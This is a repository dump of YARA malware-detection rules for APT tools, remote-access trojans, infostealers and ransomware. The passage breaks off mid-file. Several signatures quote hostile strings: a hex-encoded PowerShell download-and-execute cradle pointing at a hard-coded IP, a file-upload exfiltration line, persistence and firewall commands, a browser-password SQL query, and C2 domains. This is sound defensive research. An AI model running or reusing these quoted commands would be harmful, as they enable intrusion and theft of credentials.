├── .gitignore ├── APT ├── dtrack_lazarus_group.yar ├── micropsia_apt_c_23.yar ├── poshc2_apt_33.yar └── powerton_apt_33.yar ├── Behavioral └── steganography.yar ├── Broadbased ├── agent_tesla.yar ├── asyncrat.yar ├── ave_maria_warzone_rat.yar ├── azorult_plus_plus.yar ├── bitrat_unpacked.yar ├── blackremote_blackrat.yar ├── darktrack_rat.yar ├── dcrat.yar ├── engwultimate.yar ├── formbook.yar ├── frat.yar ├── infostealers.yar ├── kleptoparasite.yar ├── lockergoga.yar ├── megacortex.yar ├── metamorfo.yar ├── nanocore.yar ├── netwire.yar ├── parallax_rat.yar ├── quasarrat.yar ├── redline.yar ├── remcos.yar ├── ursnif_gozi_isfb.yar ├── venomrat.yar ├── wsh_rat.yar ├── xenorat.yar └── xworm.yar ├── LICENSE.md └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | .history/ 2 | -------------------------------------------------------------------------------- /APT/dtrack_lazarus_group.yar: -------------------------------------------------------------------------------- 1 | rule dtrack_2020 { 2 | meta: 3 | author = "jeFF0Falltrades" 4 | 5 | strings: 6 | $pdb = "Users\\user\\Documents\\Visual Studio 2008\\Projects\\MyStub\\Release\\MyStub.pdb" wide ascii 7 | $str_log = "------------------------------ Log File Create...." wide ascii 8 | $str_ua = "CCS_Mozilla/5.0 (Windows NT 6.1" wide ascii 9 | $str_chrome = "Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\History" wide ascii 10 | $str_tmp = "%s\\~%d.tmp" wide ascii 11 | $str_exc = "Execute_%s.log" wide ascii 12 | $str_reg_use = /net use \\\\[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\\C\$ \/delete/ 13 | $str_reg_move = /move \/y %s \\\\[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\\C\$\\Windows\\Temp\\MpLogs\\/ 14 | $hex_1 = { d1 ?? 33 ?? fc 81 ?? ff 00 00 00 c1 ?? 17 } 15 | $hex_2 = { c1 ?? 08 8b ?? fc c1 ?? 10 } 16 | $hex_3 = { 81 0D [4] 1C 31 39 29 } 17 | condition: 18 | 2 of them or $hex_3 19 | } 20 | -------------------------------------------------------------------------------- /APT/micropsia_apt_c_23.yar: -------------------------------------------------------------------------------- 1 | rule micropsia_2018 { 2 | meta: 3 | author = "jeFF0Falltrades" 4 | hash = "4c3fecea99a469a6daf2899cefe93d9acfd28a0b6c196592da47e917c53c2c76" 5 | 6 | strings: 7 | $gen_app_id = { 53 31 DB 69 93 08 D0 68 00 05 84 08 08 42 89 93 08 D0 68 00 F7 E2 89 D0 5B C3 } // 0x4072f0 loop which generates the unique "App ID" 8 | $get_temp_dir = { 68 00 04 00 00 8d 44 24 04 50 8b c7 e8 [4] 8b e8 55 e8 [2] fe ff } // 0x0042C689 func retrieving %TEMP% 9 | $str_install_appid = "ApppID.txt" wide ascii nocase 10 | 11 | condition: 12 | 2 of them 13 | } 14 | -------------------------------------------------------------------------------- /APT/poshc2_apt_33.yar: -------------------------------------------------------------------------------- 1 | rule poshc2_apt_33_2019 { 2 | meta: 3 | author = "jeFF0Falltrades" 4 | desc = "Alerts on PoshC2 payloads which align with 2019 APT33 reporting (this will not fire on all PoshC2 payloads)" 5 | ref = "http://www.rewterz.com/rewterz-news/rewterz-threat-alert-iranian-apt-uses-job-scams-to-lure-targets" 6 | 7 | strings: 8 | $js_date = /\[datetime\]::ParseExact\("[0-9]+\/[0-9]+\/[0-9]+","dd\/MM\/yyyy",\$null/ 9 | $js_crypt = "System.Security.Cryptography" wide ascii 10 | $js_host = "Headers.Add(\"Host" wide ascii 11 | $js_proxy = "$proxyurl = " wide ascii 12 | $js_arch = "$env:PROCESSOR_ARCHITECTURE" wide ascii 13 | $js_admin = "[System.Security.Principal.WindowsBuiltInRole]::Administrator" wide ascii 14 | $hta_unescape = "%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%73%63%72%69%70%74%20%74%79%70%65%3d%22%74%65%78%74%2f%76%62%73%63%72%69%70%74%22%3e%5c%6e%53%75%62%20%41%75%74%6f%4f%70%65%6e%28%29" wide ascii 15 | $hta_hex = "202f7720312049455820284e65772d4f626a656374204e65742e576562436c69656e74292e446f776e6c6f6164537472696e672827687474703a2f2f352e3235322e3137382e32302f7261797468656f6e322d6a6f62732e6a706727293b" wide ascii 16 | $hta_powershell = "706f7765727368656c6c2e657865" wide ascii 17 | 18 | condition: 19 | 4 of ($js_*) or 2 of ($hta_*) 20 | } 21 | -------------------------------------------------------------------------------- /APT/powerton_apt_33.yar: -------------------------------------------------------------------------------- 1 | rule apt_33_powerton { 2 | meta: 3 | author = "jeFF0Falltrades" 4 | hash = "6bea9a7c9ded41afbebb72a11a1868345026d8e46d08b89577f30b50f4929e85" 5 | 6 | strings: 7 | $str_wmi = "Adding wmi persist ..." wide ascii 8 | $str_registery = "Poster \"Registery Value With Name" wide ascii 9 | $str_upload = "(New-Object Net.WebClient).UploadFile(\"$SRVURL$address\", \"$fullFilePath" wide ascii 10 | $str_pass = "jILHk{Yu1}2i0h^xe|t,d+Cy:KBv!l?7" wide ascii 11 | $str_addr = "$address=\"/contact/$BID$($global:rndPost)/confirm" wide ascii 12 | $str_png = "$env:temp + \"\\\" + $(date -format dd-m-y-HH-mm-s) + \".png" wide ascii 13 | $str_msg = "/contact/msg/$BID$($global:rndPost)" wide ascii 14 | $str_ua = "Mozilla/5.0 (Windows NT $osVer; rv:38.0) Gecko/20100101 Thunderbird/38.1.0 Lightning/4.0.2" wide ascii 15 | $domain = "backupaccount.net" wide ascii 16 | 17 | condition: 18 | 2 of ($str*) or $domain 19 | } -------------------------------------------------------------------------------- /Behavioral/steganography.yar: -------------------------------------------------------------------------------- 1 | 2 | rule zip_img_stego { 3 | meta: 4 | author = "jeFF0Falltrades" 5 | description = "This rule attempts to identify ZIP (and JAR, APK, DOCX, etc.) archives embedded within various image filetypes." 6 | 7 | strings: 8 | $img_gif = { 47 49 46 38 } 9 | $img_jpeg_1 = { FF D8 FF DB } // explicitly break out JPEG variations to avoid triggering a "slowing down scanning" condition 10 | $img_jpeg_2 = { FF D8 FF E0 } 11 | $img_jpeg_3 = { FF D8 FF EE } 12 | $img_jpeg_4 = { FF D8 FF E1 } 13 | $img_png = { 89 50 4E 47 0D 0A 1A 0A } 14 | $zip_header = { 50 4B 03 04 } 15 | $zip_footer = { 50 4B 05 06 00 } 16 | 17 | condition: 18 | /* The final portion of this condition looks for the ZIP archive footer within 25 bytes 19 | of the end of the file - This can be omitted or adjusted for your use case, but appears 20 | to work for several waves of infostealers seen at the time of writing. */ 21 | (for any of ($img*): ($ at 0)) and (all of ($zip*)) and ($zip_footer in (filesize-25..filesize)) 22 | } 23 | 24 | rule zip_iso_stego { 25 | meta: 26 | author = "jeFF0Falltrades" 27 | description = "This rule identifies a specific phishing technique of sending ISO file attachments containing ZIP (and JAR, APK, DOCX, etc.) archives which in turn contain malicious executables." 28 | 29 | strings: 30 | $iso_header = { 43 44 30 30 31 } // CD001 31 | $exe_zip = { 2e 65 78 65 50 4b 05 06 00 00 00 00 01 00 01 } // .exePK signature 32 | 33 | condition: 34 | (($iso_header at 0x8001) or ($iso_header at 0x8801) or ($iso_header at 0x9001)) and $exe_zip 35 | } 36 | 37 | rule lokibot_img_stego { 38 | meta: 39 | author = "jeFF0Falltrades" 40 | description = "This rule identifies a specific variant of LokiBot which uses image steganography to obscure an encrypted payload; See reference." 41 | reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/lokibot-gains-new-persistence-mechanism-uses-steganography-to-hide-its-tracks/" 42 | 43 | strings: 44 | $img_gif = { 47 49 46 38 } 45 | $img_jpeg_1 = { FF D8 FF DB } // explicitly break out JPEG variations to avoid triggering a "slowing down scanning" condition 46 | $img_jpeg_2 = { FF D8 FF E0 } 47 | $img_jpeg_3 = { FF D8 FF EE } 48 | $img_jpeg_4 = { FF D8 FF E1 } 49 | $img_png = { 89 50 4E 47 0D 0A 1A 0A } 50 | $loki_enc_header = { 23 24 25 5e 26 2a 28 29 5f 5f 23 40 24 23 35 37 24 23 21 40 } 51 | 52 | condition: 53 | (for any of ($img*): ($ at 0)) and $loki_enc_header 54 | } -------------------------------------------------------------------------------- /Broadbased/agent_tesla.yar: -------------------------------------------------------------------------------- 1 | rule agent_tesla_2019 { 2 | meta: 3 | author = "jeFF0Falltrades" 4 | hash = "717f605727d21a930737e9f649d8cf5d12dbd1991531eaf68bb58990d3f57c05" 5 | 6 | strings: 7 | $appstr_1 = "Postbox" wide ascii nocase 8 | $appstr_2 = "Thunderbird" wide ascii nocase 9 | $appstr_3 = "SeaMonkey" wide ascii nocase 10 | $appstr_4 = "Flock" wide ascii nocase 11 | $appstr_5 = "BlackHawk" wide ascii nocase 12 | $appstr_6 = "CyberFox" wide ascii nocase 13 | $appstr_7 = "KMeleon" wide ascii nocase 14 | $appstr_8 = "IceCat" wide ascii nocase 15 | $appstr_9 = "PaleMoon" wide ascii nocase 16 | $appstr_10 = "IceDragon" wide ascii nocase 17 | // XOR sequence used in several decoding sequences in final payload 18 | $xor_seq = { FE 0C 0E 00 20 [4] 5A 20 [4] 61 } 19 | 20 | condition: 21 | all of them and #xor_seq > 10 22 | } -------------------------------------------------------------------------------- /Broadbased/asyncrat.yar: -------------------------------------------------------------------------------- 1 | rule asyncrat { 2 | meta: 3 | author = "jeFF0Falltrades" 4 | 5 | strings: 6 | $str_async = "AsyncClient" wide ascii nocase 7 | $str_aes_exc = "masterKey can not be null or empty" wide ascii 8 | $str_schtasks = "schtasks /create /f /sc onlogon /rl highest" wide ascii 9 | $dcrat_1 = "dcrat" wide ascii nocase 10 | $dcrat_2 = "qwqdan" wide ascii 11 | $dcrat_3 = "YW1zaS5kbGw=" wide ascii 12 | $dcrat_4 = "VmlydHVhbFByb3RlY3Q=" wide ascii 13 | $dcrat_5 = "save_Plugin" wide ascii 14 | $byte_aes_key_base = { 7E [3] 04 73 [3] 06 80 } 15 | $byte_aes_salt_base = { BF EB 1E 56 FB CD 97 3B B2 19 } 16 | $patt_verify_hash = { 7e [3] 04 6f [3] 0a 6f [3] 0a 74 [3] 01 } 17 | $patt_config = { 72 [3] 70 80 [3] 04 } 18 | 19 | condition: 20 | (not any of ($dcrat*)) and 6 of them and #patt_config >= 10 21 | } 22 | -------------------------------------------------------------------------------- /Broadbased/ave_maria_warzone_rat.yar: -------------------------------------------------------------------------------- 1 | rule ave_maria_warzone_rat { 2 | meta: 3 | author = "jeFF0Falltrades" 4 | ref = "https://blog.team-cymru.com/2019/07/25/unmasking-ave_maria/" 5 | 6 | strings: 7 | $str_0 = "5.206.225.104/dll/" wide ascii 8 | $str_1 = "AVE_MARIA" wide ascii 9 | $str_2 = "MortyCrypter\\MsgBox.exe" wide ascii 10 | $str_3 = "cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q" wide ascii 11 | $str_4 = "ellocnak.xml" wide ascii 12 | $str_5 = "Hey I'm Admin" wide ascii 13 | $str_6 = "AWM_FIND" wide ascii 14 | $str_7 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" wide ascii 15 | $str_8 = "warzone" wide ascii 16 | 17 | condition: 18 | 3 of them 19 | } 20 | -------------------------------------------------------------------------------- /Broadbased/azorult_plus_plus.yar: -------------------------------------------------------------------------------- 1 | import "pe" 2 | 3 | rule azorult_plus_plus { 4 | meta: 5 | author = "jeFF0Falltrades" 6 | hash = "9d6611c2779316f1ef4b4a6edcfdfb5e770fe32b31ec2200df268c3bd236ed75" 7 | 8 | strings: 9 | $rdp = "netsh firewall add portopening TCP 3389 \"Remote Desktop\"" wide ascii nocase 10 | $list_1 = "PasswordsList.txt" wide ascii nocase 11 | $list_2 = "CookieList.txt" wide ascii nocase 12 | $coin_1 = "Ethereum\\keystore" wide ascii nocase 13 | $c2_1 = ".ac.ug" wide ascii nocase 14 | $hide_user = "Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist" wide ascii nocase 15 | $pdb = "azorult_new.pdb" wide ascii nocase 16 | $lang_check = { FF 15 44 00 41 00 0F B7 C0 B9 19 04 00 00 66 3B C1 } // call ds:GetUserDefaultLangID; movzx eax, ax; mov ecx, 419h; cmp ax, cx 17 | 18 | condition: 19 | $pdb or 5 of them or pe.imphash() == "e60de0acc6c7bbe3988e8dc00556d7b9" 20 | } -------------------------------------------------------------------------------- /Broadbased/bitrat_unpacked.yar: -------------------------------------------------------------------------------- 1 | rule bitrat_unpacked 2 | { 3 | meta: 4 | author = "jeFF0Falltrades" 5 | hash = "122cd4f33d1e1b42ce0d959bc35e5d633b029f4869c5510624342b5cc5875c98" 6 | description = "Experimental rule to detect unpacked BitRat payloads on disk or in memory, looking for a combination of strings and decryption/decoding patterns" 7 | reference = "https://krabsonsecurity.com/2020/08/22/bitrat-the-latest-in-copy-pasted-malware-by-incompetent-developers/" 8 | 9 | strings: 10 | $str_0 = "string too long" wide ascii 11 | $str_1 = "invalid string position" wide ascii 12 | $hex_0 = { 6b ?? 25 99 f7 ?? 8d [2] 99 f7 } 13 | $hex_1 = { 0f ba 25 [3] 00 01 0f 82 [4] 0f ba 25 [3] 00 00 } 14 | $hex_2 = { 66 0f 6f ?? 66 0f 6f [2] 66 0f 6f [2] 66 0f 6f [2] 66 0f 7f ?? 66 0f 7f [2] 66 0f 7f [2] 66 0f 7f } 15 | $hex_3= { 8b [2] d3 ?? 33 05 } 16 | $hex_4 = { 83 [2] 00 c7 05 [8] c7 05 [8] c7 05 [8] 83 } 17 | 18 | condition: 19 | 6 of them 20 | } 21 | -------------------------------------------------------------------------------- /Broadbased/blackremote_blackrat.yar: -------------------------------------------------------------------------------- 1 | rule blackremote_blackrat_payload_2020 2 | { 3 | meta: 4 | author = "jeFF0Falltrades" 5 | ref = "https://unit42.paloaltonetworks.com/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/" 6 | 7 | strings: 8 | $str_vers_1 = "16.0.0.0" wide ascii 9 | $str_vers_2 = "16.2.0.0" wide ascii 10 | $re_c2_1 = /%\*%\|[A-Z0-9]+?\|%\*%\|[A-Z0-9]+?\|%\*%\|[A-Z0-9]+?\|%\*%\|[A-Z0-9]+?/ wide ascii 11 | $re_c2_2 = /\|!\*!\|\|!\*!\|/ wide ascii 12 | $hex_rsrc = { 06 12 09 28 ?? 00 00 0A 6F ?? 00 00 0A 06 12 09 28 ?? 00 00 0A 6F ?? 00 00 0A 06 12 09 28 ?? 00 00 0A 6F ?? 00 00 0A } 13 | 14 | condition: 15 | 2 of them and (1 of ($re*) or $hex_rsrc) 16 | } 17 | 18 | rule blackremote_blackrat_proclient_2020 19 | { 20 | meta: 21 | author = "jeFF0Falltrades" 22 | ref = "https://unit42.paloaltonetworks.com/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/" 23 | 24 | strings: 25 | $str_0 = "K:\\5.0\\Black Server 5.0\\BlackServer\\bin\\Release\\BlackRATServerM.pdb" wide ascii nocase 26 | $str_1 = "BlackRATServerM.pdb" wide ascii nocase 27 | $str_2 = "RATTypeBinder" wide ascii nocase 28 | $str_3 = "ProClient.dll" wide ascii nocase 29 | $str_4 = "Clientx.dll" wide ascii nocase 30 | $str_5 = "FileMelting" wide ascii nocase 31 | $str_6 = "Foxmail.url.mailto\\Shell\\open\\command" wide ascii nocase 32 | $str_7 = "SetRemoteDesktopQuality" wide ascii nocase 33 | $str_8 = "RecoverChrome" wide ascii nocase 34 | $str_9 = "RecoverFileZilla" wide ascii nocase 35 | $str_10 = "RemoteAudioGetInfo" wide ascii nocase 36 | 37 | condition: 38 | 4 of them 39 | } 40 | -------------------------------------------------------------------------------- /Broadbased/darktrack_rat.yar: -------------------------------------------------------------------------------- 1 | import "pe" 2 | 3 | rule darktrack_rat { 4 | meta: 5 | author = "jeFF0Falltrades" 6 | hash = "1472dd3f96a7127a110918072ace40f7ea7c2d64b95971e447ba3dc0b58f2e6a" 7 | ref = "https://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml" 8 | 9 | strings: 10 | $dt_pdb = "C:\\Users\\gurkanarkas\\Desktop\\Dtback\\AlienEdition\\Server\\SuperObject.pas" wide ascii 11 | $dt_pas = "SuperObject.pas" wide ascii 12 | $dt_user = "].encryptedUsername" wide ascii 13 | $dt_pass = "].encryptedPassword" wide ascii 14 | $dt_yandex = "\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data" wide ascii 15 | $dt_alien_0 = "4.0 Alien" wide ascii 16 | $dt_alien_1 = "4.1 Alien" wide ascii 17 | $dt_victim = "Local Victim" wide ascii 18 | 19 | condition: 20 | (3 of ($dt*)) or pe.imphash() == "ee46edf42cfbc2785a30bfb17f6da9c2" or pe.imphash() == "2dbff3ce210d5c2b4ba36c7170d04dc2" 21 | } -------------------------------------------------------------------------------- /Broadbased/dcrat.yar: -------------------------------------------------------------------------------- 1 | rule dcrat { 2 | meta: 3 | author = "jeFF0Falltrades" 4 | 5 | strings: 6 | $venom_1 = "VenomRAT" wide ascii nocase 7 | $venom_2 = "HVNC_REPLY_MESSAGE" wide ascii 8 | $str_aes_exc = "masterKey can not be null or empty" wide ascii 9 | $str_b64_amsi = "YW1zaS5kbGw=" wide ascii 10 | $str_b64_virtual_protect = "VmlydHVhbFByb3RlY3Q=" wide ascii 11 | $str_dcrat = "dcrat" wide ascii nocase 12 | $str_plugin = "save_Plugin" wide ascii 13 | $str_qwqdan = "qwqdan" wide ascii 14 | $byte_aes_key_base = { 7E [3] 04 73 [3] 06 80 } 15 | $patt_config = { 72 [3] 70 80 [3] 04 } 16 | $patt_verify_hash = { 7e [3] 04 6f [3] 0a 6f [3] 0a 74 [3] 01 } 17 | 18 | condition: 19 | (not any of ($venom*)) and 5 of them and #patt_config >= 10 20 | } 21 | -------------------------------------------------------------------------------- /Broadbased/engwultimate.yar: -------------------------------------------------------------------------------- 1 | rule EngWUltimate { 2 | meta: 3 | author = "jeFF0Falltrades" 4 | hash = "953b1b99bb5557fe86b3525f28f60d78ab16d56e9c3b4bbe75aba880f18cb6ad" 5 | 6 | strings: 7 | $b64_1 = "ZG8gbm90IHNjcmlwdA==" wide ascii // do not script 8 | $b64_2 = "Q2xpcEJvYXJkIExvZw==" wide ascii // ClipBoard Log 9 | $b64_3 = "RW5nIFdpe" wide ascii // Eng Wiz 10 | $b64_4 = "SEtFWV9DVVJSRU5UX1VTRVJcU29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25c" wide ascii // HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ 11 | $b64_5 = "Q3JNb2RNbmdy" wide ascii // CrModMngr 12 | $b64_6= "JVBER" wide ascii // Embedded data 13 | $b64_7 = "qQAAMAAAAEAAAA" wide ascii // Embedded data 14 | $str_1 = "Eng Wiz" wide ascii nocase 15 | $str_2 = "Engr Whizzy" wide ascii nocase 16 | $str_3 = "ClipBoard Log" wide ascii 17 | $str_4 = "Keylogger Log" wide ascii 18 | $str_pdb = "C:\\Users\\USER\\AppData\\Roaming\\System\\jobs" wide ascii nocase 19 | // ᚰᚣᛓᚦᚸᚸ᚜ᚨᚻᚼᚱᚻ --> decodes to SEtFWV9DVVJSRU5UX1VTRVJcU29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu --> decodes to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 20 | $hex_reg = { b0 16 a3 16 d3 16 a6 16 b8 16 b8 16 9c 16 a8 16 bb 16 bc 16 b1 16 bb 16 } 21 | // MD5 hashing func 22 | $hex_md5_func = { 73 46 01 00 0A 0A 28 30 01 00 0A 02 6F 98 00 00 0A 0B 1F ?? 28 7D 00 00 0A } 23 | 24 | condition: 25 | uint16(0) == 0x5A4D and ((3 of ($b64*)) or (3 of ($str*)) or (any of ($hex*))) 26 | } -------------------------------------------------------------------------------- /Broadbased/formbook.yar: -------------------------------------------------------------------------------- 1 | // Fires on Formbook VB6 initial and extracted files 2 | rule formbook_vb { 3 | meta: 4 | author = "jeFF0Falltrades" 5 | ref = "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/" 6 | 7 | strings: 8 | $hex_set_info = { 68 65 73 73 00 68 50 72 6F 63 68 74 69 6F 6E 68 6F 72 6D 61 68 74 49 6E 66 68 4E 74 53 65 54 EB 2C } 9 | $hex_decode_loop = { 81 34 24 [4] 83 E9 03 E0 F1 FF 34 0E 81 34 24 } 10 | $hex_anti_check = { 80 78 2A 00 74 3D 80 78 2B 00 74 37 80 78 2C 00 75 31 80 78 2D 00 75 2B 80 78 2E 00 74 25 80 78 2F 00 75 1F 80 78 30 00 74 19 80 78 31 00 75 13 80 78 32 00 74 0D 80 78 33 00 } 11 | $hex_precheck = { E8 AE FA FF FF 3D 00 03 00 00 0F 9F C2 56 88 56 35 E8 3D FC FF FF 56 E8 E7 F6 FF FF 56 E8 41 F9 FF FF 56 E8 AB F7 FF FF 56 E8 F5 DE FF FF } 12 | $str_marker = "r5.oZe/gg" wide ascii 13 | 14 | condition: 15 | 2 of them 16 | } 17 | -------------------------------------------------------------------------------- /Broadbased/frat.yar: -------------------------------------------------------------------------------- 1 | rule frat_loader { 2 | meta: 3 | author = "jeFF0Falltrades" 4 | ref = "https://twitter.com/jeFF0Falltrades/status/1270709679375646720" 5 | 6 | strings: 7 | $str_report_0 = "$ReportDone = Get-BDE" wide ascii 8 | $str_report_1 = "$Report = Get-BDE" wide ascii 9 | $str_img_0= "$ImgURL = Get-BDE" wide ascii 10 | $str_img_1 = "Write-Host 'No Image'" wide ascii 11 | $str_img_2 = "$goinf + \"getimageerror\"" wide ascii 12 | $str_link = "$eLink = Get-BDE" wide ascii 13 | $str_tmp_0 = "$Shortcut.WorkingDirectory = $TemplatesFolder" wide ascii 14 | $str_tmp_1 = "TemplatesFolder = [Environment]::GetFolderPath" wide ascii 15 | $str_tmp_2 = "$vbout = $($TemplatesFolder)" wide ascii 16 | $str_shurtcut = "Get-Shurtcut" wide ascii 17 | $str_info_0 = "info=LoadFirstError" wide ascii 18 | $str_info_1 = "info=LoadSecondError" wide ascii 19 | $str_info_2 = "getimagedone?msg" wide ascii 20 | $str_info_3 = "donemanuel?id" wide ascii 21 | $str_info_4 = "getDone?msg" wide ascii 22 | $str_info_5 = "getManualDone?msg" wide ascii 23 | 24 | condition: 25 | 3 of them 26 | } 27 | 28 | rule frat_executable { 29 | meta: 30 | author = "jeFF0Falltrades" 31 | ref = "https://twitter.com/jeFF0Falltrades/status/1270709679375646720" 32 | 33 | strings: 34 | $str_path_0 = "FRat\\\\Short-Port" wide ascii 35 | $str_path_1 = "FRatv8\\\\Door\\\\Stub" wide ascii 36 | $str_path_2 = "snapshot\\\\Stub\\\\V1.js" wide ascii 37 | $str_sails = "sails.io" wide ascii 38 | $str_crypto = "CRYPTOGAMS by " wide ascii 39 | $str_socketio = "socket.io-client" wide ascii 40 | 41 | condition: 42 | 3 of them 43 | } 44 | -------------------------------------------------------------------------------- /Broadbased/infostealers.yar: -------------------------------------------------------------------------------- 1 | rule infostealer_xor_patterns { 2 | meta: 3 | author = "jeFF0Falltrades" 4 | hash = "d5d1d28270adc1588cf6be33a876587a3c689f6a51ea797eae6b64b5b15805b1" 5 | description = "The XOR and string patterns shown here appear to be unique to certain information-stealing malware families, namely LokiBot and Pony/Fareit. The XOR patterns were observed in a several loaders and payloads for LokiBot, but have also appeared (less frequently) in Pony/Fareit loaders and samples. The two accompanying rules below can be used to further classify the final payloads." 6 | 7 | strings: 8 | // call dword ptr ds:[<&GetLastInputInfo>]; sub eax,edi; cmp eax,143 9 | // User input check in first stage loader (anti-VM) 10 | $hx_get_input = { ff 15 58 7f 47 00 a1 60 7f 47 00 2b c7 3d 43 01 00 00 } 11 | 12 | // xor byte ptr ds:[ecx],45; inc dword ptr ss:[ebp-4]; cmp dword ptr ss:[ebp-4],5E07 13 | // XOR loop in first stage loader to decrypt the second stage loader 14 | $hx_xor_1 = { 80 31 45 FF 45 FC 81 7D FC 07 5E 00 00 } 15 | 16 | // ($hx_xor_3 ^ 0x45) 17 | // Second stage loader XOR loop pattern as it is stored in first stage loader prior to being XOR'd 18 | $hx_xor_2 = { c8 51 44 c6 a7 4a cf 51 7f 75 55 05 } 19 | 20 | // lea edx,dword ptr ds:[ecx+eax]; and edx,F; mov dl,byte ptr ds:[edx+edi]; xor byte ptr ds:[eax],dl; inc eax 21 | // This is ($hx_xor_2 ^ 0x45), found in the second stage loader stub after being XOR'd by the first stage loader 22 | $hx_xor_3 = { 8d 14 01 83 e2 0f 8a 14 3a 30 10 40 } 23 | 24 | // xor ecx,0x4358ad54; shr ecx,1; dec eax 25 | // XOR loop found in final payload 26 | $hx_xor_4 = { 81 F1 54 AD 58 43 D1 E9 48 } 27 | 28 | condition: 29 | $hx_xor_4 or 2 of them 30 | } 31 | 32 | // Strings common to LokiBot 33 | rule infostealer_loki { 34 | strings: 35 | $str_builder = "fuckav.ru" nocase wide ascii 36 | $str_cyb_fox = "%s\\8pecxstudios\\Cyberfox\\profiles.ini" wide ascii 37 | $str_c2 = "fre.php" wide ascii 38 | 39 | condition: 40 | any of them and infostealer_xor_patterns 41 | } 42 | 43 | // Strings common to Pony 44 | rule infostealer_pony { 45 | strings: 46 | $str_softx = "Software\\SoftX.org\\FTPClient\\Sites" wide ascii 47 | $str_ftp_plus = "FTP++.Link\\shell\\open\\command" wide ascii 48 | $str_c2 = "gate.php" wide ascii 49 | 50 | condition: 51 | any of them and infostealer_xor_patterns 52 | } 53 | -------------------------------------------------------------------------------- /Broadbased/kleptoparasite.yar: -------------------------------------------------------------------------------- 1 | rule kleptoparasite { 2 | meta: 3 | author = "jarcher" 4 | hash = "2109fdb52f63a8821a7f3efcc35fa36e759fe8b57db82aa9b567254b8fb03fb1" 5 | 6 | strings: 7 | $str_full_pdb = "E:\\Work\\HF\\KleptoParasite Stealer 2018\\Version 3\\3 - 64 bit firefox n chrome\\x64\\Release\\Win32Project1.pdb" wide ascii nocase 8 | $str_part_pdb_1 = "KleptoParasite" wide ascii nocase 9 | $str_part_pdb_2 = "firefox n chrome" wide ascii nocase 10 | $str_sql= "SELECT origin_url, username_value, password_value FROM logins" wide ascii nocase 11 | $str_chrome_32 = "
Google Chrome 32bit NOT INSTALLED" wide ascii nocase 12 | $str_firefox_32 = "
FireFox 32bit NOT INSTALLED" wide ascii nocase 13 | $str_chrome_64 = "
Google Chrome 64bit NOT INSTALLED" wide ascii nocase 14 | $str_firefox_64 = "
FireFox 64bit NOT INSTALLED" wide ascii nocase 15 | $str_outlook_32 = "Microsoft Outlook 32 bit" wide ascii nocase 16 | $str_outlook_64 = "Microsoft Outlook 64 bit" wide ascii nocase 17 | $str_outlook_prof = "Outlook\\Profiles\\Outlook\\" wide ascii 18 | $str_obf = "naturaleftouterightfullinnercross" wide ascii nocase 19 | $str_c2 = "ftp.totallyanonymous.com" wide ascii nocase 20 | $str_fn = "fc64.exe" wide ascii nocase 21 | $str_ip = "myexternalip.com/raw" wide ascii 22 | $str_ret = "IP retriever" wide ascii 23 | $str_dxwrk = "DXWRK.html" wide ascii 24 | 25 | condition: 26 | 3 of them 27 | } 28 | -------------------------------------------------------------------------------- /Broadbased/lockergoga.yar: -------------------------------------------------------------------------------- 1 | rule lockergoga { 2 | meta: 3 | author = "jeFF0Falltrades" 4 | hash = "bdf36127817413f625d2625d3133760af724d6ad2410bea7297ddc116abc268f" 5 | 6 | strings: 7 | $dinkum = "licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED" wide ascii nocase 8 | $ransom_1 = "You should be thankful that the flaw was exploited by serious people and not some rookies." wide ascii nocase 9 | $ransom_2 = "Your files are encrypted with the strongest military algorithms RSA4096 and AES-256" wide ascii nocase 10 | $str_1 = "(readme-now" wide ascii nocase 11 | $mlcrosoft = "Mlcrosoft" wide ascii nocase 12 | $mutex_1 = "MX-tgytutrc" wide ascii nocase 13 | $cert_1 = "16 Australia Road Chickerell" wide ascii nocase 14 | $cert_2 = { 2E 7C 87 CC 0E 93 4A 52 FE 94 FD 1C B7 CD 34 AF } // MIKL LIMITED 15 | $cert_3 = { 3D 25 80 E8 95 26 F7 85 2B 57 06 54 EF D9 A8 BF } // CCOMODO RSA Code Signing CA 16 | $cert_4 = { 4C AA F9 CA DB 63 6F E0 1F F7 4E D8 5B 03 86 9D } // COMODO SECURE 17 | 18 | condition: 19 | 4 of them 20 | } 21 | -------------------------------------------------------------------------------- /Broadbased/megacortex.yar: -------------------------------------------------------------------------------- 1 | import "pe" 2 | 3 | // Fires on discovered MegaCortex samples using certificate signatures 4 | rule megacortex_payload { 5 | meta: 6 | author = "jeFF0Falltrades" 7 | reference = "https://news.sophos.com/en-us/2019/05/03/megacortex-ransomware-wants-to-be-the-one/" 8 | 9 | condition: 10 | uint16(0) == 0x5a4d and ((for any i in (0..pe.number_of_signatures) : (pe.signatures[i].serial == "04:c7:cd:cc:16:98:e2:5b:49:3e:b4:33:8d:5e:2f:8b" or pe.signatures[i].serial == "71:a0:b7:36:95:dd:b1:af:c2:3b:2b:9a:18:ee:54:cb" or pe.signatures[i].serial == "5a:59:a6:86:b4:a9:04:d0:fc:a0:71:53:ea:6d:b6:cc")) or pe.imphash() == "81da9241b26f498f1f7a1123ab76bb9d" or pe.imphash() == "ac3a9bb6fa7b3e8b91bfebe68b0d501b" or pe.imphash() == "17c56ef351018d9d9dabf0025a0394ac") 11 | } 12 | 13 | // Fires on the batch file used to stop AV/other services running prior to 